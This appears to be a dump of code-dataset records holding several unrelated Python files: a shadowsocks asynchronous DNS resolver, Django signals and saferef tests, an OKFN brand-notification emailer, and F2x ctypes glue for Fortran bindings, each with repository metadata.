py/src/streamcorpus_filter/_filter.py
|
Python
|
mit
| 8,706 | 0.005628 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2014-2015 clowwindy
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import, division, print_function, \
with_statement
import sys
import os
import socket
import struct
import re
import logging
from shadowsocks import common, lru_cache, eventloop, shell
CACHE_SWEEP_INTERVAL = 30
VALID_HOSTNAME = re.compile(br"(?!-)[_A-Z\d-]{1,63}(?<!-)$", re.IGNORECASE)
common.patch_socket()
# rfc1035
# format
# +---------------------+
# | Header |
# +---------------------+
# | Question | the question for the name server
# +---------------------+
# | Answer | RRs answering the question
# +---------------------+
# | Authority | RRs pointing toward an authority
# +---------------------+
# | Additional | RRs holding additional information
# +---------------------+
#
# header
# 1 1 1 1 1 1
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | ID |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# |QR| Opcode |AA|TC|RD|RA| Z | RCODE |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | QDCOUNT |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | ANCOUNT |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | NSCOUNT |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | ARCOUNT |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
QTYPE_ANY = 255
QTYPE_A = 1
QTYPE_AAAA = 28
QTYPE_CNAME = 5
QTYPE_NS = 2
QCLASS_IN = 1
def build_address(address):
address = address.strip(b'.')
labels = address.split(b'.')
results = []
for label in labels:
l = len(label)
if l > 63:
return None
results.append(common.chr(l))
results.append(label)
results.append(b'\0')
return b''.join(results)
def build_request(address, qtype):
request_id = os.urandom(2)
header = struct.pack('!BBHHHH', 1, 0, 1, 0, 0, 0)
addr = build_address(address)
qtype_qclass = struct.pack('!HH', qtype, QCLASS_IN)
return request_id + header + addr + qtype_qclass
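# Worked example of the wire format produced above, assuming a QTYPE_A query
# for 'example.com' (the two request id bytes are random):
#
#   build_address(b'example.com') == b'\x07example\x03com\x00'
#   header == struct.pack('!BBHHHH', 1, 0, 1, 0, 0, 0)   # RD=1, QDCOUNT=1
#   request == id (2 bytes) + header (10) + address (13) + struct.pack('!HH', 1, 1)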
def parse_ip(addrtype, data, length, offset):
if addrtype == QTYPE_A:
return socket.inet_ntop(socket.AF_INET, data[offset:offset + length])
elif addrtype == QTYPE_AAAA:
return socket.inet_ntop(socket.AF_INET6, data[offset:offset + length])
elif addrtype in [QTYPE_CNAME, QTYPE_NS]:
return parse_name(data, offset)[1]
else:
return data[offset:offset + length]
def parse_name(data, offset):
p = offset
labels = []
l = common.ord(data[p])
while l > 0:
if (l & (128 + 64)) == (128 + 64):
# pointer
pointer = struct.unpack('!H', data[p:p + 2])[0]
pointer &= 0x3FFF
r = parse_name(data, pointer)
labels.append(r[1])
p += 2
# pointer is the end
return p - offset, b'.'.join(labels)
else:
labels.append(data[p + 1:p + 1 + l])
p += 1 + l
l = common.ord(data[p])
return p - offset + 1, b'.'.join(labels)
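# Worked example for the uncompressed case, using the raw label sequence
# b'\x07example\x03com\x00' at offset 0:
#
#   parse_name(b'\x07example\x03com\x00', 0) == (13, b'example.com')
#
# A pointer label (top two bits 0xC0 set) recurses into the referenced offset
# and terminates the name, per the RFC 1035 compression scheme.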
# rfc1035
# record
# 1 1 1 1 1 1
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | |
# / /
# / NAME /
# | |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | TYPE |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | CLASS |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | TTL |
# | |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | RDLENGTH |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--|
# / RDATA /
# / /
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
def parse_record(data, offset, question=False):
nlen, name = parse_name(data, offset)
if not question:
record_type, record_class, record_ttl, record_rdlength = struct.unpack(
'!HHiH', data[offset + nlen:offset + nlen + 10]
)
ip = parse_ip(record_type, data, record_rdlength, offset + nlen + 10)
return nlen + 10 + record_rdlength, \
(name, ip, record_type, record_class, record_ttl)
else:
record_type, record_class = struct.unpack(
'!HH', data[offset + nlen:offset + nlen + 4]
)
return nlen + 4, (name, None, record_type, record_class, None, None)
def parse_header(data):
if len(data) >= 12:
header = struct.unpack('!HBBHHHH', data[:12])
res_id = header[0]
res_qr = header[1] & 128
res_tc = header[1] & 2
res_ra = header[2] & 128
res_rcode = header[2] & 15
# assert res_tc == 0
# assert res_rcode in [0, 3]
res_qdcount = header[3]
res_ancount = header[4]
res_nscount = header[5]
res_arcount = header[6]
return (res_id, res_qr, res_tc, res_ra, res_rcode, res_qdcount,
res_ancount, res_nscount, res_arcount)
return None
def parse_response(data):
try:
if len(data) >= 12:
header = parse_header(data)
if not header:
return None
res_id, res_qr, res_tc, res_ra, res_rcode, res_qdcount, \
res_ancount, res_nscount, res_arcount = header
qds = []
ans = []
offset = 12
for i in range(0, res_qdcount):
l, r = parse_record(data, offset, True)
offset += l
if r:
qds.append(r)
for i in range(0, res_ancount):
l, r = parse_record(data, offset)
offset += l
if r:
ans.append(r)
for i in range(0, res_nscount):
l, r = parse_record(data, offset)
offset += l
for i in range(0, res_arcount):
l, r = parse_record(data, offset)
offset += l
response = DNSResponse()
if qds:
response.hostname = qds[0][0]
for an in qds:
response.questions.append((an[1], an[2], an[3]))
for an in ans:
response.answers.append((an[1], an[2], an[3]))
return response
except Exception as e:
shell.print_exception(e)
return None
def is_valid_hostname(hostname):
if len(hostname) > 255:
return False
if hostname[-1] == b'.':
hostname = hostname[:-1]
return all(VALID_HOSTNAME.match(x) for x in hostname.split(b'.'))
class DNSResponse(object):
def __init__(self):
self.hostname = None
self.questions = [] # each: (addr, type, class)
self.answers = [] # each: (addr, type, class)
def __str__(self):
return '%s: %s' % (self.hostname, str(self.answers))
STATUS_FIRST = 0
STATUS_SECOND = 1
class DNSResolver(object):
def __init__(self, server_list=None, prefer_ipv6=False):
self._loop = None
self._hosts = {}
self._hostname_status = {}
self._hostname_to_cb = {}
self._cb_to_hostname = {}
self._cache = lru_cache.LRUCache(timeout=300)
self._sock = None
if server_list is None:
self._servers = None
self._parse_resolv()
else:
self._servers = server_list
if prefer_ipv6:
self._QTYPES = [QTYPE_AAAA, QTYPE_A]
else:
self._QTYPES = [QTYPE_A, QTYPE_AAAA]
self._parse_hosts()
# TODO monitor hosts change and reload hosts
# TODO parse /etc/gai.conf and follow its rules
def _parse_resolv(self):
self._servers = []
try:
with open('/etc/resolv.conf', 'rb') as f:
content = f.readlines()
for line in content:
line = line.strip()
if not (line and line.startswith(b'nameserver')):
continue
parts = line.split()
if len(parts) < 2:
continue
server = parts[1]
if common.is_ip(server) == socket.AF_INET:
if type(server) != str:
server = server.decode('utf8')
self._servers.append(server)
except IOError:
pass
if not self._servers:
self._servers = ['8.8.4.4', '8.8.8.8']
def _parse_hosts(self):
etc_path = '/etc/hosts'
if 'WINDIR' in os.environ:
etc_path = os.environ['WINDIR'] + '/system32/drivers/etc/hosts'
try:
with open(etc_path, 'rb') as f:
for line in f.readlines():
line = line.strip()
parts = line.split()
if len(parts) < 2:
continue
ip = parts[0]
if not common.is_ip(ip):
continue
for i in range(1, len(parts)):
hostname = parts[i]
if hostname:
self._hosts[hostname] = ip
except IOError:
self._hosts['localhost'] = '127.0.0.1'
def add_to_loop(self, loop):
if self._loop:
raise Exception('already add to loop')
self._loop = loop
# TODO when dns server is IPv6
self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM,
socket.SOL_UDP)
self._sock.setblocking(False)
loop.add(self._sock, eventloop.POLL_IN, self)
loop.add_periodic(self.handle_periodic)
def _call_callback(self, hostname, ip, error=None):
callbacks = self._hostname_to_cb.get(hostname, [])
for callback in callbacks:
if callback in self._cb_to_hostname:
del self._cb_to_hostname[callback]
if ip or error:
callback((hostname, ip), error)
else:
callback((hostname, None),
Exception('unknown hostname %s' % hostname))
if hostname in self._hostname_to_cb:
del self._hostname_to_cb[hostname]
if hostname in self._hostname_status:
del self._hostname_status[hostname]
def _handle_data(self, data):
response = parse_response(data)
if response and response.hostname:
hostname = response.hostname
ip = None
for answer in response.answers:
if answer[1] in (QTYPE_A, QTYPE_AAAA) and \
answer[2] == QCLASS_IN:
ip = answer[0]
break
if not ip and self._hostname_status.get(hostname, STATUS_SECOND) \
== STATUS_FIRST:
self._hostname_status[hostname] = STATUS_SECOND
self._send_req(hostname, self._QTYPES[1])
else:
if ip:
self._cache[hostname] = ip
self._call_callback(hostname, ip)
elif self._hostname_status.get(hostname, None) \
== STATUS_SECOND:
for question in response.questions:
if question[1] == self._QTYPES[1]:
self._call_callback(hostname, None)
break
def handle_event(self, sock, fd, event):
if sock != self._sock:
return
if event & eventloop.POLL_ERR:
logging.error('dns socket err')
self._loop.remove(self._sock)
self._sock.close()
# TODO when dns server is IPv6
self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM,
socket.SOL_UDP)
self._sock.setblocking(False)
self._loop.add(self._sock, eventloop.POLL_IN, self)
else:
data, addr = sock.recvfrom(1024)
if addr[0] not in self._servers:
                logging.warning('received a packet from a server other than our dns')
return
self._handle_data(data)
def handle_periodic(self):
self._cache.sweep()
def remove_callback(self, callback):
hostname = self._cb_to_hostname.get(callback)
if hostname:
del self._cb_to_hostname[callback]
arr = self._hostname_to_cb.get(hostname, None)
if arr:
arr.remove(callback)
if not arr:
del self._hostname_to_cb[hostname]
if hostname in self._hostname_status:
del self._hostname_status[hostname]
def _send_req(self, hostname, qtype):
req = build_request(hostname, qtype)
for server in self._servers:
logging.debug('resolving %s with type %d using server %s',
hostname, qtype, server)
self._sock.sendto(req, (server, 53))
def resolve(self, hostname, callback):
if type(hostname) != bytes:
hostname = hostname.encode('utf8')
if not hostname:
callback(None, Exception('empty hostname'))
elif common.is_ip(hostname):
callback((hostname, hostname), None)
elif hostname in self._hosts:
logging.debug('hit hosts: %s', hostname)
ip = self._hosts[hostname]
callback((hostname, ip), None)
elif hostname in self._cache:
logging.debug('hit cache: %s', hostname)
ip = self._cache[hostname]
callback((hostname, ip), None)
else:
if not is_valid_hostname(hostname):
callback(None, Exception('invalid hostname: %s' % hostname))
return
arr = self._hostname_to_cb.get(hostname, None)
if not arr:
self._hostname_status[hostname] = STATUS_FIRST
self._send_req(hostname, self._QTYPES[0])
self._hostname_to_cb[hostname] = [callback]
self._cb_to_hostname[callback] = hostname
else:
arr.append(callback)
# TODO send again only if waited too long
self._send_req(hostname, self._QTYPES[0])
def close(self):
if self._sock:
if self._loop:
self._loop.remove_periodic(self.handle_periodic)
self._loop.remove(self._sock)
self._sock.close()
self._sock = None
def test():
dns_resolver = DNSResolver()
loop = eventloop.EventLoop()
dns_resolver.add_to_loop(loop)
global counter
counter = 0
def make_callback():
global counter
def callback(result, error):
global counter
# TODO: what can we assert?
print(result, error)
counter += 1
if counter == 9:
dns_resolver.close()
loop.stop()
a_callback = callback
return a_callback
assert(make_callback() != make_callback())
dns_resolver.resolve(b'google.com', make_callback())
dns_resolver.resolve('google.com', make_callback())
dns_resolver.resolve('example.com', make_callback())
dns_resolver.resolve('ipv6.google.com', make_callback())
dns_resolver.resolve('www.facebook.com', make_callback())
dns_resolver.resolve('ns2.google.com', make_callback())
dns_resolver.resolve('invalid.@!#$%^&$@.hostname', make_callback())
dns_resolver.resolve('toooooooooooooooooooooooooooooooooooooooooooooooooo'
'ooooooooooooooooooooooooooooooooooooooooooooooooooo'
'long.hostname', make_callback())
dns_resolver.resolve('toooooooooooooooooooooooooooooooooooooooooooooooooo'
'ooooooooooooooooooooooooooooooooooooooooooooooooooo'
'ooooooooooooooooooooooooooooooooooooooooooooooooooo'
'ooooooooooooooooooooooooooooooooooooooooooooooooooo'
'ooooooooooooooooooooooooooooooooooooooooooooooooooo'
'ooooooooooooooooooooooooooooooooooooooooooooooooooo'
'long.hostname', make_callback())
loop.run()
if __name__ == '__main__':
test()
|
plus1s/shadowsocks-py-mu
|
shadowsocks/asyncdns.py
|
Python
|
apache-2.0
| 17,651 | 0.00017 |
from django.dispatch import Signal
pre_save = Signal(providing_args=['instance', 'action', ])
post_save = Signal(providing_args=['instance', 'action', ])
pre_delete = Signal(providing_args=['instance', 'action', ])
post_delete = Signal(providing_args=['instance', 'action', ])
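# Hedged receiver sketch; the handler name and printed message are
# hypothetical, only Signal.connect and the providing_args above are given:
#
# def on_timeline_save(sender, instance=None, action=None, **kwargs):
#     print('timeline %s: %s' % (action, instance))
#
# post_save.connect(on_timeline_save)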
|
thoas/django-sequere
|
sequere/contrib/timeline/signals.py
|
Python
|
mit
| 279 | 0 |
from django.core.mail import send_mail
from django.core.urlresolvers import reverse
class EmailNotification:
msg_from = 'OKFN team <noreply@okfn.org>'
def __init__(self, msg_to, msg_from=None):
self.msg_to = msg_to
if msg_from:
self.msg_from = msg_from
def send_mail(self, subject, message):
send_mail(subject, message, self.msg_from, [self.msg_to],
fail_silently=True)
def create_notification(self, brand_nm, bsin):
brand_url = reverse('brand', args=(bsin,))
subject = "%s added to the OKFN brand repository" % brand_nm
message = """Dear contributor,
Your brand %s was added to the OKFN brand repository under BSIN %s.
More details at http://product.okfn.org%s .
Thank you for your contribution.
Regards,
OKFN brand manager team""" % (brand_nm, bsin, brand_url)
self.send_mail(subject, message)
def delete_notification(self, brand_nm, comment):
subject = "%s rejected from OKFN brand repository" % brand_nm
message = """Dear contributor,
Your brand proposal for %s was rejected from the OKFN brand repository.
Moderator comment : %s
Thank you for your contribution.
Regards,
OKFN brand manager team""" % (brand_nm, comment)
self.send_mail(subject, message)
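# Hedged usage sketch; the recipient, brand name, BSIN and comment are
# hypothetical placeholders:
#
# notifier = EmailNotification('contributor@example.org')
# notifier.create_notification('Acme Cola', '00012345678')
# notifier.delete_notification('Acme Cola', 'duplicate of BSIN 00087654321')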
|
okfn/brand-manager
|
manager/apps/brand/notifications.py
|
Python
|
mit
| 1,306 | 0 |
import unittest
from django.dispatch.saferef import safeRef
from django.utils.six.moves import xrange
class Test1(object):
def x(self):
pass
def test2(obj):
pass
class Test2(object):
def __call__(self, obj):
pass
class SaferefTests(unittest.TestCase):
def setUp(self):
ts = []
ss = []
for x in xrange(5000):
t = Test1()
ts.append(t)
s = safeRef(t.x, self._closure)
ss.append(s)
ts.append(test2)
ss.append(safeRef(test2, self._closure))
for x in xrange(30):
t = Test2()
ts.append(t)
s = safeRef(t, self._closure)
ss.append(s)
self.ts = ts
self.ss = ss
self.closureCount = 0
def tearDown(self):
del self.ts
del self.ss
def testIn(self):
"""Test the "in" operator for safe references (cmp)"""
for t in self.ts[:50]:
self.assertTrue(safeRef(t.x) in self.ss)
def testValid(self):
"""Test that the references are valid (return instance methods)"""
for s in self.ss:
self.assertTrue(s())
def testShortCircuit(self):
"""Test that creation short-circuits to reuse existing references"""
sd = {}
for s in self.ss:
sd[s] = 1
for t in self.ts:
if hasattr(t, 'x'):
self.assertTrue(safeRef(t.x) in sd)
else:
self.assertTrue(safeRef(t) in sd)
def testRepresentation(self):
"""Test that the reference object's representation works
XXX Doesn't currently check the results, just that no error
is raised
"""
repr(self.ss[-1])
def _closure(self, ref):
"""Dumb utility mechanism to increment deletion counter"""
self.closureCount += 1
|
Beeblio/django
|
tests/dispatch/tests/test_saferef.py
|
Python
|
bsd-3-clause
| 1,886 | 0 |
# Copyright 2018 German Aerospace Center (DLR)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
F2x 'ctypes' template glue library.
This module contains helpers that are used by the code generated by the 'ctypes' library. It mainly deals with setting
correct C interfaces and converting values between FORTRAN and Python types. Arrays are handled by NumPy.
Usually there should be no need to access this module directly.
"""
import ctypes
import numpy
def constructor(cfunc):
"""
Make a C function a constructor.
The C interface is defined to accept no parameters and return a void pointer. It is also wrapped as a staticmethod
to allow usage in classes.
:param cfunc: The plain C function as imported from the C library using ctypes.
:return: A static method with appropriate C interface.
"""
cfunc.argtypes = []
cfunc.restype = ctypes.c_void_p
return staticmethod(cfunc)
def destructor(cfunc):
"""
Make a C function a destructor.
Destructors accept pointers to void pointers as argument. They are also wrapped as a staticmethod for usage in
classes.
:param cfunc: The C function as imported by ctypes.
:return: The configured destructor.
"""
cfunc.argtypes = [ctypes.POINTER(ctypes.c_void_p)]
cfunc.restype = None
return staticmethod(cfunc)
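# Usage sketch (library and symbol names hypothetical): the generated wrappers
# apply these helpers to the raw functions imported through ctypes, e.g.
#   _lib = ctypes.CDLL('libexample.so')
#   class Example(object):
#       _new = constructor(_lib.example_new)
#       _free = destructor(_lib.example_free)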
def array_from_pointer(ctype, dims, ptr, strlen=None, dealloc=None):
"""
    Helper that converts a pointer into a NumPy array view.
    The underlying buffer is interpreted with flat layout.
    :param ctype: Type of the contents of the array.
    :param dims: List with the current sizes of the array.
    :param ptr: Address of array memory.
    :param strlen: Item size when converting character arrays (optional).
    :param dealloc: C deallocator to call when the returned view is deleted (optional).
    :return: A NumPy array that views the referred data.
"""
class ManagedArray(numpy.ndarray):
def __array_finalize__(self, obj):
if isinstance(obj, ManagedArray):
self.f2x_parent = obj
def __del__(self):
if hasattr(self, 'f2x_ptr'):
array_size = ctypes.c_int(len(self))
self.f2x_dealloc(ctypes.byref(array_size), ctypes.byref(self.f2x_ptr))
array_size = 1
for size in dims:
array_size *= size
array_type = ctype * array_size
c_array = array_type.from_address(ctypes.addressof(ptr.contents))
if strlen is None:
array = numpy.ctypeslib.as_array(c_array, dims)
else:
array = numpy.char.array(c_array, itemsize=strlen, copy=False, order='F')
if dealloc is not None:
array = array.view(ManagedArray)
array.f2x_dealloc = dealloc
array.f2x_ptr = ptr
return array
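# Illustrative sketch (buffer setup assumed): viewing a flat C buffer of six
# int32 values as a NumPy array without copying:
#   buf = (ctypes.c_int32 * 6)(*range(6))
#   cptr = ctypes.cast(buf, ctypes.POINTER(ctypes.c_int32))
#   view = array_from_pointer(ctypes.c_int32, [6], cptr)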
class NullPointerError(BaseException):
"""
This exception is raised when Python wrapper code tries to access a C pointer that was not (yet) allocated (i.e. is
null). This exception is handled to automatically allocate dynamic arrays upon first assignment.
"""
pass
def _getter(ctype, cfunc):
if issubclass(ctype, FType):
cfunc.argtypes = [ctypes.c_void_p]
cfunc.restype = ctypes.c_void_p
def _get(ptr):
cptr = cfunc(ptr)
if cptr is None:
raise NullPointerError()
return ctype(ctypes.c_void_p(cptr), False)
return _get
elif ctype == ctypes.c_char_p:
cfunc.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctypes.c_char_p)]
cfunc.restype = None
def _get(ptr):
cptr = ctypes.c_char_p(0)
cfunc(ptr, ctypes.byref(cptr))
return cptr.value.decode('utf-8').rstrip()
return _get
else:
cfunc.argtypes = [ctypes.c_void_p]
cfunc.restype = ctype
return cfunc
def _setter(ctype, cfunc, strlen=None):
if cfunc is None:
return None
elif ctype == ctypes.c_char_p:
cfunc.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctype)]
cfunc.restype = None
def _set(ptr, value):
cstring = ctypes.create_string_buffer(value.encode('utf-8'), strlen)
cvalue = ctypes.cast(cstring, ctypes.c_char_p)
cfunc(ptr, ctypes.byref(cvalue))
return _set
else:
cfunc.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctype)]
cfunc.restype = None
def _set(ptr, value):
cvalue = ctype(value)
cfunc(ptr, ctypes.byref(cvalue))
return _set
def _allocator(ctype, cfunc):
if cfunc is None:
return None
cfunc.argtypes = [ctypes.c_void_p]
cfunc.restype = None
return cfunc
class Field(object):
def __init__(self, ctype, getter, setter=None, allocator=None, strlen=None):
self.ctype = ctype
self.getter = _getter(ctype, getter)
self.setter = _setter(ctype, setter, strlen)
self.allocator = _allocator(ctype, allocator)
def __get__(self, instance, owner):
if instance is None:
return self
try:
return self.getter(instance.ptr)
except NullPointerError:
self.allocator(instance.ptr)
return self.getter(instance.ptr)
def __set__(self, instance, value):
if self.setter:
self.setter(instance.ptr, value)
elif issubclass(self.ctype, FType):
try:
target = self.getter(instance.ptr)
except NullPointerError:
self.allocator(instance.ptr)
target = self.getter(instance.ptr)
target.copy_from(value)
else:
raise AttributeError("Not settable.")
def _global_getter(ctype, cfunc):
if issubclass(ctype, FType):
cfunc.argtypes = []
cfunc.restype = ctypes.c_void_p
def _get():
cptr = cfunc()
if cptr is None:
raise NullPointerError()
return ctype(ctypes.c_void_p(cptr), False)
return _get
elif ctype == ctypes.c_char_p:
cfunc.argtypes = [ctypes.POINTER(ctypes.c_char_p)]
cfunc.restype = None
def _get():
cptr = ctypes.c_char_p(0)
cfunc(ctypes.byref(cptr))
return cptr.value.decode('utf-8').rstrip()
return _get
else:
cfunc.argtypes = []
cfunc.restype = ctype
return cfunc
def _global_setter(ctype, cfunc, strlen=None):
if cfunc is None:
return None
elif ctype == ctypes.c_char_p:
cfunc.argtypes = [ctypes.POINTER(ctype)]
cfunc.restype = None
def _set(value):
cstring = ctypes.create_string_buffer(value.encode('utf-8'), strlen)
cvalue = ctypes.cast(cstring, ctypes.c_char_p)
cfunc(ctypes.byref(cvalue))
return _set
else:
cfunc.argtypes = [ctypes.POINTER(ctype)]
cfunc.restype = None
def _set(value):
cvalue = ctype(value)
cfunc(ctypes.byref(cvalue))
return _set
def _global_allocator(ctype, cfunc):
if cfunc is None:
return None
cfunc.argtypes = []
cfunc.restype = None
return cfunc
class Global(Field):
def __init__(self, ctype, getter, setter=None, allocator=None, strlen=None):
self.ctype = ctype
self.getter = _global_getter(ctype, getter)
self.setter = _global_setter(ctype, setter, strlen)
self.allocator = _global_allocator(ctype, allocator)
def __get__(self, instance, owner):
if instance is None:
return self
try:
return self.getter()
except NullPointerError:
self.allocator()
return self.getter()
def __set__(self, instance, value):
if self.setter:
self.setter(value)
elif issubclass(self.ctype, FType):
try:
target = self.getter()
except NullPointerError:
self.allocator()
target = self.getter()
target.copy_from(value)
else:
raise AttributeError("Not settable.")
class FTypeFieldArray(object):
def __init__(self, field, ptr):
self.field = field
self.ptr = ptr
def __len__(self):
return self.ptr.dims[self.field.name][0]
def __getitem__(self, index):
if not isinstance(index, (list, tuple)):
return self[(index, )]
else:
return self.field.getter(self.ptr, index)
def __setitem__(self, index, value):
if not isinstance(index, (list, tuple)):
self[(index, )] = value
else:
self[index].copy_from(value)
def allocate(self, *sizes):
self.field.allocator(self.ptr, sizes)
def _array_getter(name, ctype, cfunc):
if ctype == ctypes.c_char_p:
cfunc.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctypes.POINTER(ctypes.c_int32))]
cfunc.restype = ctypes.c_void_p
def _get(instance, index):
index = (ctypes.c_int32 * len(instance.dims))(*index)
cindex = ctypes.cast(index, ctypes.POINTER(ctypes.c_int32))
cptr = ctypes.c_char_p(0)
cfunc(instance.ptr, ctypes.byref(cindex), ctypes.byref(cptr))
return cptr.value.decode('utf-8').rstrip()
return _get
elif issubclass(ctype, FType):
cfunc.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctypes.POINTER(ctypes.c_int32))]
cfunc.restype = ctypes.c_void_p
def _get(instance, index):
index = (ctypes.c_int32 * len(instance.dims[name]))(*index)
cindex = ctypes.cast(index, ctypes.POINTER(ctypes.c_int32))
cptr = cfunc(instance.ptr, ctypes.byref(cindex))
return ctype(cptr, False)
return _get
else:
cfunc.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctypes.POINTER(ctype))]
cfunc.restype = None
def _get(instance):
cptr = ctypes.POINTER(ctype)()
cfunc(instance.ptr, ctypes.byref(cptr))
try:
carray = array_from_pointer(ctype, instance.dims[name], cptr)
except ValueError:
raise NullPointerError
return numpy.ndarray(instance.dims[name], ctype, carray, order='F')
return _get
def _array_setter(name, ctype, cfunc):
if ctype == ctypes.c_char_p:
cfunc.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctypes.POINTER(ctypes.c_int32)), ctypes.POINTER(ctype)]
cfunc.restype = None
def _set(instance, index, value):
cindex = (ctypes.c_int32 * len(instance.dims))(*index)
cptr = ctypes.cast(cindex, ctypes.POINTER(ctypes.c_int32))
cbuffer = ctypes.create_string_buffer(value.encode('utf-8'))
cvalue = ctypes.cast(cbuffer, ctypes.c_char_p)
cfunc(instance.ptr, ctypes.byref(cptr), ctypes.byref(cvalue))
return _set
def _array_allocator(name, ctype, cfunc):
if cfunc is None:
return
elif ctype == ctypes.c_char_p:
cfunc.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctypes.POINTER(ctypes.c_int32))]
cfunc.restype = None
def _alloc(instance, sizes):
csizes = (ctypes.c_int32 * len(instance.dims[name]))(*sizes)
cptr = ctypes.cast(csizes, ctypes.POINTER(ctypes.c_int32))
cfunc(instance.ptr, ctypes.byref(cptr))
instance.dims[name][:] = sizes
return _alloc
else:
cfunc.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctypes.POINTER(ctypes.c_int32))]
cfunc.restype = None
def _alloc(instance, sizes):
csizes = (ctypes.c_int32 * len(instance.dims[name]))(*sizes)
cptr = ctypes.cast(csizes, ctypes.POINTER(ctypes.c_int32))
cfunc(instance.ptr, ctypes.byref(cptr))
instance.dims[name][:] = sizes
return _alloc
class ArrayField(object):
def __init__(self, name, ctype, dims, getter, setter, allocator=None, strlen=None):
self.name = name
self.ctype = ctype
self.dims = dims
self.getter = _array_getter(self.name, self.ctype, getter)
self.setter = _array_setter(self.name, self.ctype, setter)
self.allocator = _array_allocator(self.name, self.ctype, allocator)
self.strlen = strlen
def __get__(self, instance, owner):
if self.strlen is not None:
return StringFieldArray(self, instance)
elif issubclass(self.ctype, FType):
return FTypeFieldArray(self, instance)
else:
return self.getter(instance)
def __set__(self, instance, value):
if issubclass(self.ctype, FType):
array = FTypeFieldArray(self, instance)
for target, source in zip(array, value):
target.copy_from(source)
else:
try:
array = self.getter(instance)
except NullPointerError:
value = numpy.array(value)
self.allocator(instance, value.shape)
array = self.getter(instance)
array[:] = value
class StringFieldArray(FTypeFieldArray):
def __setitem__(self, index, value):
if not isinstance(index, (list, tuple)):
self[(index, )] = value
else:
self.field.setter(self.ptr, index, value)
def _global_array_getter(name, ctype, cfunc):
if issubclass(ctype, FType):
cfunc.argtypes = [ctypes.POINTER(ctypes.POINTER(ctypes.c_int32))]
cfunc.restype = ctypes.c_void_p
def _get(instance, index):
index = (ctypes.c_int32 * len(instance.dims))(*index)
cindex = ctypes.cast(index, ctypes.POINTER(ctypes.c_int32))
cptr = cfunc(ctypes.byref(cindex))
return ctype(cptr, False)
return _get
else:
cfunc.argtypes = [ctypes.POINTER(ctypes.POINTER(ctype))]
cfunc.restype = None
def _get(instance):
cptr = ctypes.POINTER(ctype)()
cfunc(ctypes.byref(cptr))
try:
carray = array_from_pointer(ctype, instance.dims, cptr)
except ValueError:
raise NullPointerError
return numpy.ndarray(instance.dims, ctype, carray, order='F')
return _get
def _global_array_allocator(name, cfunc):
if cfunc is None:
return
cfunc.argtypes = [ctypes.POINTER(ctypes.POINTER(ctypes.c_int32))]
cfunc.restype = None
def _alloc(instance, sizes):
csizes = (ctypes.c_int32 * len(instance.dims[name]))(*sizes)
cptr = ctypes.cast(csizes, ctypes.POINTER(ctypes.c_int32))
cfunc(ctypes.byref(cptr))
instance.dims[name][:] = sizes
return _alloc
class ArrayGlobal(ArrayField):
def __init__(self, name, ctype, dims, getter, allocator=None):
self.name = name
self.ctype = ctype
self.dims = dims
self.getter = _global_array_getter(self.name, self.ctype, getter)
self.allocator = _global_array_allocator(self.name, allocator)
def __get__(self, instance, owner):
if issubclass(self.ctype, FType):
return FTypeFieldArray(self, instance)
else:
return self.getter(instance)
def __set__(self, instance, value):
if issubclass(self.ctype, FType):
array = FTypeFieldArray(self, instance)
for target, source in zip(array, value):
target.copy_from(source)
else:
try:
array = self.getter(instance)
except NullPointerError:
value = numpy.array(value)
self.allocator(instance, value.shape)
array = self.getter(instance)
array[:] = value
class FType(object):
_new = None
_free = None
def __init__(self, cptr=None, owned=None, **kwargs):
if cptr is None:
self.ptr = ctypes.c_void_p(self._new())
self.owned = owned if owned is not None else True
else:
self.ptr = cptr
self.owned = owned if owned is not None else False
self.dims = {
name: list(field.dims)
for name, field in self.fields(ArrayField)
}
for name, value in kwargs.items():
setattr(self, name, value)
def __del__(self):
if self.owned:
self.owned = False
self._free(ctypes.byref(self.ptr))
def copy_from(self, other):
for name, field in self.fields():
if isinstance(field, ArrayField):
continue
try:
value = getattr(other, name)
except (UnicodeDecodeError, ValueError, NullPointerError):
continue
setattr(self, name, value)
@classmethod
def fields(cls, types=(Field, ArrayField)):
for name, field in cls.__dict__.items():
if isinstance(field, types):
yield name, field
